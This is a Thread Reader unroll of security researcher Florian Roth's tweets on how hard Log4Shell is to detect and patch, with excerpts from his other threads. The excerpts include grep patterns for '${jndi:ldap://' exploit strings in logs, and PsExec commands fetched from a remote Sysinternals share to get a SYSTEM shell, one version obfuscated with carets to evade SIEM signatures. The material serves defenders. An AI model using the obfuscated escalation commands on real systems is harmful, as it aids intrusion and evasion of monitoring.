Share this page!

Florian Roth ⚡️ Profile picture
Twitter logo
11 Dec, 6 tweets, 1 min read
1/ #Log4Shell Status determination

# Block Rules / Log-Based Detection
There's no effective or rather gapless way to detect attacks that use log4shell due to the many ways to obfuscate the strings.
Don't put too much trust in any filter/detection pattern. All can be bypassed.
..
2/ # Behaviour Based Detection

We thought about network based detection, but it could be any remote port and any remote system. Java can have many legitimate outgoing connections & often has suspicious sub processes.
3/ # Vulnerability Detection

It's difficult to find vulnerable software. It could be the web app, the ticket mgmt that receives contact form content or the backup software. Vuln scanners won't give a complete picture.
Discovery could take months.
Try to use the Canary Tokens.
4/ # Patching

Since it's difficult to determine the vulnerable applications, it'll be difficult to patch what you don't know.
5/ # Post-Exploitation / Compromise Assessments

My best hope is that we can find enough evidence after a successful exploitation. Attackers have goals and try to persist their access on a compromised systems. Current tools and frameworks should help us with that.
6/ # Final thoughts

I hope that we can at least filter and detect the simple attempts and prevent some damage.
I wish you all the best in the coming months.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Florian Roth ⚡️

Florian Roth ⚡️ Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @cyb3rops

Florian Roth ⚡️ Profile picture
10 Dec
Quick check in /var/log folder or where your apps store their logs

sudo grep -r '${jndi:ldap://' /var/log

#log4j #log4jrce
If you find something, please send me a redacted version of it - I'd like to see log lines of real world exploitation attempts
Improved version

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
Read 4 tweets
Florian Roth ⚡️ Profile picture
13 Oct
Elevate your cmd.exe to LOCAL_SYSTEM?

\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Have you ever seen this being used by an adversary? I haven't but I like it. Image
If you can't use the SMB protocol to hosts on the Internet, try WebDav over HTTPS

net use z: hxxps://live.sysinternals.com/tools && z:\PsExec.exe -s -c cmd.exe

(had to change the URL scheme because twitter would otherwise transform it - see screenshot) Image
And let's add some obfuscation to hide from sloppy signatures or case-sensitive searches in your SIEM

net use z: htT^pS://li^ve.sysInTer^nals.com/toOls && z:\Ps^EXeC.eXe -s c^md.e^xe Image
Read 5 tweets
Florian Roth ⚡️ Profile picture
1 Aug
I’d like to clarify my position on #Microsoft in general

Many things have improved over the last 10 years .. a lot .. especially with Windows 10/2016.
Today many fellow security researchers that I highly respect work there.

I criticize Microsoft’s response to recent ..
vulnerabilities (or design flaws) because I care about these things and believe that customers do care too.
I don’t think that it is fair / right to tell them to migrate to the cloud-based solution in order to get rid of these issues.

There are still few but good reasons ..
.. not to opt for the cloud.

I strongly believe that weaknesses in default configs that allow an attacker to escalate privs to Domain Admin should be addressed with a KB patch and not just a pointer to an advisory.
Many won’t read it.

I really hope that you continue the ..
Read 4 tweets
Florian Roth ⚡️ Profile picture
26 Oct 20
1/ Since we go through the #Githubification of InfoSec, knowing git has become an essential skill

My recommendations:

Read a tutorial to get to know the basic terminology
rogerdudler.github.io/git-guide/

Do an interactive training but I'd consider it optional
katacoda.com/courses/git
2/
For newcomers or occasional users I'd recommend a GUI

- Github Desktop (Windows, Linux, macOS)
desktop.github.com
github.com/shiftkey/deskt…
- SourceTree (macOS, Windows)
sourcetreeapp.com
- GitKraken (Windows, Linux, macOS)
gitkraken.com

...
3/ What you'll need in practice is called "pull requests", often from your own forked version of another repository

docs.github.com/en/free-pro-te…

It goes like this:
1. Create a fork
2. Modify the fork, add files, change content
3. Create pull request for the original repository
Read 5 tweets
Florian Roth ⚡️ Profile picture
15 Mar 20
1/x A #COVID19 #OffTopic thread for my followers in countries that still enjoy the quiet before the storm.

It is serious. Don't listen to the voices that play it down.
But also don't panic.

The problem with SARS-CoV-2 is that the treatment of severe cases (~5-10%) require ..
2/x .. intensive care beds with respirators.

Here in Germany, we have 29k intensive care beds, most of them occupied long before COVID19.
If only 1% of the citizens get sick, that would be 830k citizens, 83k of them with the severe clinical course of the disease.
3/x I guess you can imagine what that means.

Italy is about 10 days ahead of us.
Doctors in Italy decide every morning in a so called "triage" who gets a bed with lung ventilator and who doesn't, which is basically a death sentence.
These patients slowly suffocate.
Read 7 tweets
Florian Roth ⚡️ Profile picture
9 Nov 19
Log Sources Top 5
(ordered by cost-benefit ratio / volume > detectable threats)

1. Antivirus
2. Windows Eventlog (+Sysmon)
3. Proxy
4. Firewall
5. DNS
1/ I‘ll give some short comments to help you understand the order

In general: I included only those logs that can already be collected in most organizations, when you start a SecMon project.
Bro/Zeek, Suricata, Netflow, etc. would be somewhere between 2 and 4 if available. ..
2/ Some logs are more difficult (cost/effort) to tap into.
e.g. Antivirus logs can often be collected from a single console, while NSM requires high speed network Taps on mirroring ports in central locations (💵). If you have the budget and time, NSM is worth the effort.
Read 11 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Like this author's thread?

Get emails when @cyb3rops has new unrolls!

Check out other threads from @cyb3rops!

Read all threads by @cyb3rops

:(